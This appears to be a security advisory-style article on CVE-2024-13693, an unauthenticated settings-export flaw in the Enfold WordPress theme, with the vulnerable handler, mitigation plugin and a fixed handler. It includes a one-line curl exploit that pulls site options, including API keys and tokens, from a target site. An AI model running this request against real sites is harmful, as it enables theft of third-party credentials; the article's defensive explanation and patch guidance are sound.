In early 2024, security researchers identified a major vulnerability in one of the web’s most popular WordPress themes, Enfold. If you or your clients use Enfold (any version up to 6..9), this is a must-read.
CVE-2024-13693 allows anyone—literally anyone, no login needed—to export critical settings from your site. These settings could expose sensitive information like your Mailchimp API Key, Google reCAPTCHA secrets, or even your Envato private token.
This article gives you a deep yet simple look at how the vulnerability works, how attackers can exploit it, code samples, and what you need to do to protect your site.
The Vulnerability Explained
Every WordPress plugin or theme should check if a user has the right "capability" before performing sensitive actions. In the Enfold theme, a file named avia-export-class.php is responsible for exporting settings—but it lacks a capability check.
What this means:
Anyone who knows your website's URL can send a request and download all your Avia (Enfold) settings, including private API keys, without logging in.
How Does Exploitation Work?
The export functionality is exposed via a simple HTTP GET or POST request. Attackers don’t need an account. They just send a request to something like:
https://your-site.com/wp-admin/admin-ajax.php?action=avia_ajax_export_settings
All an attacker needs is the right action value. This is often very easy for an attacker to guess or find in the theme’s JavaScript code.
Let’s look at the simplified vulnerable code (from avia-export-class.php):

    // Hook in the AJAX action
    add_action('wp_ajax_avia_ajax_export_settings', array($this, 'ajax_export_settings'));
    // Note: wp_ajax_ hooks only run for logged-in users. For the unauthenticated access
    // described above, the same handler would also have to be registered on the
    // wp_ajax_nopriv_ variant (assumed here, or easily misconfigured). Either way, the
    // defect is in the handler itself:
    public function ajax_export_settings() {
        // No capability check - anyone who reaches this function gets the full option set!
        $settings = get_option('avia_options');
        echo json_encode($settings);
        exit;
    }
What’s missing? Before exporting the data, the code should check if the user has manage_options or a similar capability.
Here’s how an attacker could export your settings using curl:

    curl "https://victimsite.com/wp-admin/admin-ajax.php?action=avia_ajax_export_settings"
The exported settings can include:
- Mailchimp API key (if connected)
- Google reCAPTCHA site/secret keys
- Envato private token
An example response might look like this (illustrative values):

    {
      "mailchimp_api_key": "us123456789abcdefghi",
      "recaptcha_secret_key": "6LeIxAcTAAAAAGG-vFI1TnRWxMZNFuojJ4WifJWe",
      "envato_private_token": "I3MC3Qj2nY4KV8cC1yQwcFjjGjQq!"
      // ... many other settings
    }
References and Further Reading
- Wordfence Advisory: CVE-2024-13693
- Enfold theme official site
- CVE Details Entry (to be published)
Patch Status
Kriesi, the maintainers of Enfold, released version 6.1 which fixes this issue. The update ensures only admins (or users with the right capabilities) can trigger the settings export.
How To Fix & Secure
If you are running Enfold v6..9 or below, update immediately via the WordPress dashboard or download the latest package from your Kriesi account.
If you cannot update for some reason, a temporary mitigation is to block access to admin-ajax.php for unauthenticated users. Treat this as a last resort: admin-ajax.php also serves legitimate front-end features that are registered on wp_ajax_nopriv_ hooks (contact forms, live search, and similar), so blocking it wholesale may break parts of the public site.
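A narrower stop-gap than blocking admin-ajax.php outright is to refuse only the vulnerable action unless the caller holds manage_options. The must-use plugin below is an added example written for this article, not Kriesi's or Enfold's code; the action name is the one shown above, while the file name, function name and log line format are assumptions:

```php
<?php
/**
 * Plugin Name: Deny unauthorized Avia settings export (temporary mitigation)
 *
 * Added example, not Kriesi/Enfold code. Save as
 * wp-content/mu-plugins/deny-avia-export.php on a site that cannot yet update to 6.1.
 * It intercepts admin-ajax.php requests for the vulnerable action before any theme
 * handler runs and refuses them unless the caller has manage_options. Every other
 * admin-ajax.php action is left alone, so front-end features keep working.
 */

// Action name as shown in the article; the constant name itself is assumed.
const AVIA_EXPORT_ACTION = 'avia_ajax_export_settings';

/**
 * Pure decision helper (assumed name): true when the requested action is the
 * settings export and the current user cannot manage options.
 */
function deny_avia_export_should_block( $requested_action, $user_can_manage ) {
    return $requested_action === AVIA_EXPORT_ACTION && ! $user_can_manage;
}

add_action( 'admin_init', function () {
    // admin-ajax.php fires admin_init before it dispatches wp_ajax_* and
    // wp_ajax_nopriv_* hooks, so this runs for logged-in and anonymous callers alike.
    if ( ! wp_doing_ajax() ) {
        return;
    }

    $action = isset( $_REQUEST['action'] )
        ? sanitize_key( wp_unslash( $_REQUEST['action'] ) )
        : '';

    if ( deny_avia_export_should_block( $action, current_user_can( 'manage_options' ) ) ) {
        // Record the refusal so blocked attempts are visible in the PHP error log.
        error_log( sprintf(
            'deny-avia-export: refused action "%s" from %s',
            $action,
            $_SERVER['REMOTE_ADDR'] ?? 'unknown'
        ) );
        // 403 with a JSON body; wp_send_json_error() calls wp_die() and stops execution.
        wp_send_json_error( array( 'message' => 'Unauthorized' ), 403 );
    }
}, 0 );
```

Priority 0 on admin_init makes the check run before anything the theme registers at the default priority, and because it keys on the action parameter rather than on admin-ajax.php as a whole, legitimate anonymous AJAX traffic is unaffected. Remove the file once the site is on 6.1 or later.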
Lessons for Developers
- Always use capability checks before processing sensitive export/import features.
Here is what a secure capability check might look like:

    public function ajax_export_settings() {
        // Authorization: only users who may manage options get the export.
        if (!current_user_can('manage_options')) {
            wp_die('Unauthorized');
        }
        $settings = get_option('avia_options');
        echo json_encode($settings);
        exit;
    }
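The capability check is the essential fix, but a privileged export handler usually needs two more things: it should only ever be reachable by logged-in users (no wp_ajax_nopriv_ registration), and it should verify a nonce so an administrator cannot be tricked into triggering it from another site. The class below is an added example written for this article, not the theme's code; the class name, nonce action name and helper method are assumptions, while the AJAX action and option names are the ones shown above:

```php
<?php
// Added example, not Enfold's code. Shows the page's capability check together with
// a logged-in-only hook and CSRF nonce verification. Class and nonce names are assumed.

class Avia_Export_Example {
    // Nonce action string (assumed name); tied to this one operation.
    const NONCE_ACTION = 'avia_export_settings';

    public function __construct() {
        // Logged-in users only: deliberately no wp_ajax_nopriv_ registration, so
        // anonymous callers never reach the handler at all.
        add_action( 'wp_ajax_avia_ajax_export_settings', array( $this, 'ajax_export_settings' ) );
    }

    /**
     * Value the admin page script sends back in the 'security' request field
     * (for example via wp_localize_script). Assumed helper name.
     */
    public function nonce_for_client() {
        return wp_create_nonce( self::NONCE_ACTION );
    }

    public function ajax_export_settings() {
        // 1. wp_ajax_ implies authentication, not authorization: require the capability.
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_send_json_error( array( 'message' => 'Unauthorized' ), 403 );
        }

        // 2. CSRF: the request must carry a valid nonce for this action in 'security';
        //    check_ajax_referer() terminates the request with -1 if it does not.
        check_ajax_referer( self::NONCE_ACTION, 'security' );

        // 3. Emit JSON with the correct content type and stop; wp_send_json() calls wp_die().
        wp_send_json( get_option( 'avia_options' ) );
    }
}

new Avia_Export_Example();
```

The order matters: the capability check comes first so that a non-administrator learns nothing from the nonce check, and wp_send_json replaces the raw echo/exit pair so the response carries an application/json content type and a meaningful HTTP status.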
Conclusion
CVE-2024-13693 is a textbook example of why access control is essential for WordPress plugins and themes.
Do yourself—and your users—a favor:
Timeline
Published on: 02/25/2025 10:15:09 UTC
Last modified on: 02/28/2025 01:35:34 UTC